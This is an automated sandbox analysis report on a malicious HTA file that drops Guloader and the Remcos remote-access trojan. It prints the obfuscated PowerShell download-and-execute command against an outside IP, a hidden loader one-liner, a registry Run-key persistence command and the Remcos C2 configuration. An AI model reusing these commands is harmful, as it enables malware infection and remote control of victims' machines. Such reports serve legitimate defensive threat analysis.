Overview

overview

10

Static

static

1

e9e36b1d63...40.hta

windows7-x64

10

e9e36b1d63...40.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25-09-2024 07:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e9e36b1d6323ad3225e16dd0d6992140.hta

  • Size

    115KB

  • MD5

    e9e36b1d6323ad3225e16dd0d6992140

  • SHA1

    a60f66174b84e52d090137011bc58d0e4e3d2d68

  • SHA256

    4cebd23193adc8cf5b28b41969c491df4243b1d3b02633327bc7dbcbb5ca9a82

  • SHA512

    b274ad46d1b701a574e782c7c96f8717eff52e193305666288f12fa8860f25eacced86b1024c0cc3f2951b20c8c9d05772e03191cbf419b3cc9e21c668688d17

  • SSDEEP

    48:7oa+apd7Ah23j0eQqYaH5PqYa8h7j5glG8smrVZA99Ddv2dzjZlUqYaXHqYaAhFj:Ea+M7xQOPNTUfofF2VoYHLzLHjrUAT

Score
10/10
guloaderremcosrem_doc2defense_evasiondiscoverydownloaderexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Rem_doc2

C2

107.173.4.16:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-DSGECX

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e9e36b1d6323ad3225e16dd0d6992140.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jqlf8cti.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2736
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC1AA.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2780
        • C:\Users\Admin\AppData\Roaming\audiodg.exe
          "C:\Users\Admin\AppData\Roaming\audiodg.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" -windowstyle hidden "$Lysintensiteters=Get-Content 'C:\Users\Admin\AppData\Roaming\euthanasic\satineredes\Gammastraales\Maxiernes95\Rabarbergrden.Afm';$Chunderous=$Lysintensiteters.SubString(56880,3);.$Chunderous($Lysintensiteters)"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2612
            • C:\Users\Admin\AppData\Local\Temp\salited.exe
              "C:\Users\Admin\AppData\Local\Temp\salited.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious use of WriteProcessMemory
              PID:1380
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\armbroeste\').Speedboat;%Risalamands238% ($Handspring)"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1916
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\armbroeste\').Speedboat;%Risalamands238% ($Handspring)"
                  8⤵
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Modifies registry key
                  PID:2856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESC1AB.tmp
    Filesize

    1KB

    MD5

    ac3bf81a8ae8b87dd044e52081e57627

    SHA1

    f8e5935ae6cb4d544f8b172e577048f4ed2c7094

    SHA256

    60c44b8f7ef6a581729ec9a0740d45c64eaa92f87eb23f8d661edc46e2355182

    SHA512

    b7fca1a85f23eadd5873eead4a7f4b3f45a01f7e66242c5c33ff6a9d7ee0266d56656b0f53675d0938e028683d99438c8124773b2b7908298e60860ae4d7ab97

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\jqlf8cti.dll
    Filesize

    3KB

    MD5

    999532f9b33ba9ee4ce86d56d5c890cc

    SHA1

    601b281bb699afac595b2fa96f6c982d7da4d8a3

    SHA256

    24ce21fb3bef910eb31b208467e77220e79411c8a52aff90fe730e67d62d47c1

    SHA512

    9ef06ee0575e567232b9b8b8d5251affc42383d6426b23070a89cccbddd941fe52cd5396a4101624c7e2663088f4029352ada37b09e6f40cef39e45bb18f386e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\jqlf8cti.pdb
    Filesize

    7KB

    MD5

    a94bda521a3ef640630df8e924d1b300

    SHA1

    548d5693a0768483ee3afa7457b6ea409a5a843c

    SHA256

    e7cde453817d504f7caebf38825d14ec75be70428be6f0db29c9603ad1c265a3

    SHA512

    5def8e5917bb61866c96be3800377525ac61ff9c23e6f927ef04482524a0510e2cca0dd5a24784af34d69005cf1bcc8cdc7f15144763bd18ad3c74c21db0b720

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    5c96f38acfefe89f84c4ddf0b441bae6

    SHA1

    71df51cd680332610783951de64abe2528f8c138

    SHA256

    939f566a4359d09a962d3398f52bf1c4bfd3ad77d3d97d4d748ca088ee3ae854

    SHA512

    5d9857d432764210f1864e5e664ecd67f01c6fd8b374b0c79714f6b0e87c33b339cc3e9d61ac7869bd50a5cb8a9667aa5b8026a6a5a2f685850275b728aef3b4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\audiodg.exe
    Filesize

    658KB

    MD5

    c5aceb5a91bf991604daec67bde90bc7

    SHA1

    66f965774fbee77e43d089281366d1256b312386

    SHA256

    547ffc87de4f0a1aa0c3031152ba6297e1b0aa81e41fa1d5f97a63318137206d

    SHA512

    a774095ba9c245ecb217fabbcc3f5a37d9678ef1e304543834a54eb554fb0735b761957cd254c30b5ee0e73638c2992580fffe68b1aadb824e76a8b10c375a6e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\euthanasic\satineredes\Gammastraales\Kordon.int
    Filesize

    314KB

    MD5

    bdfb00f48094664301b955139669444b

    SHA1

    13dfa5fe6afabe51641e7080a73de52381544382

    SHA256

    958388d7d8f5b6d68e801d8d597a6627c8cf63daf87cc9baa35bd0e5d270cfad

    SHA512

    5490f651b643a7b3d0a2d501634dede26f481cde57123e3c6f942620adb3e72afbb266c262bb305545df58746832a1611946c8fcdd3a464c30d424658379960b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\euthanasic\satineredes\Gammastraales\Maxiernes95\Rabarbergrden.Afm
    Filesize

    55KB

    MD5

    008e87be411ded72a46511a077bc91f1

    SHA1

    3ecdaa325cdad56e51b8799caee08d7d6c670bf7

    SHA256

    a635b01f4ecc32a646bc2ad4eac2261ced6dced764427e4d7900c1bed66d874f

    SHA512

    06da3f805dff9bc503f6e7507165362af82884023c77121c0057ab0f260311772e3efc72af6641b16543ad734aced21825db065d9109e1354066b70bf14c06a9

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC1AA.tmp
    Filesize

    652B

    MD5

    c5f0d29f2ab40808ad2f4413033f22c2

    SHA1

    9774f4e66c5d5067bd493ff182a582b1fa08fc4c

    SHA256

    31de50618eb9eee9c864da5b5be163bcc969ef216834a9c6f86a358163d3d4b1

    SHA512

    0a9744cee638061fd1a3996ee56fecca9b474cfc94572ee44409b1f3f91d56c8d81114d8e8e28b875f45383aa7afea10bd94fc7e2bd20e7f42fef51fb22c9eb2

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\jqlf8cti.0.cs
    Filesize

    479B

    MD5

    79d525f7443b9b32c04c66fdf771524a

    SHA1

    760c943c817a688bd0ae6d07ffad1c4d4b5496f1

    SHA256

    6a75cfe74270167848fea3d86e892883e9f43b9770da0200447561994dfd8d0d

    SHA512

    88bc46830dcf9f48c93ce8da04fce858f17877a3720fb9fa5633052d81df22c84bc2fd5048af34a7285fac106de77446484c125c2d1b0f5fadaac7b05eaa99df

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\jqlf8cti.cmdline
    Filesize

    309B

    MD5

    ccfeedf760172d8cd1618300fb282128

    SHA1

    6bbb416c21678589341b5893ab17068c46e09d06

    SHA256

    c417767c6b2c3e5b91fe9b6f9aca92d2905362fe39cade2b13b4757cc2686f0b

    SHA512

    bc53740b8f1e81cd2d34e85f63cb816509e4a1801b808bd87f54ef96b16e555ab990dfceeb35bb1860cae288b78a6a0e963c03ca058dc25b1a58250de8538208

    Download Submit

  • memory/1380-56-0x00000000014F0000-0x0000000003AA0000-memory.dmp

    Filesize

    37.7MB

    Download

  • memory/1380-58-0x0000000000480000-0x00000000014E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1380-72-0x0000000000480000-0x00000000014E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1380-76-0x0000000000480000-0x00000000014E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2612-52-0x00000000065B0000-0x0000000008B60000-memory.dmp

    Filesize

    37.7MB

    Download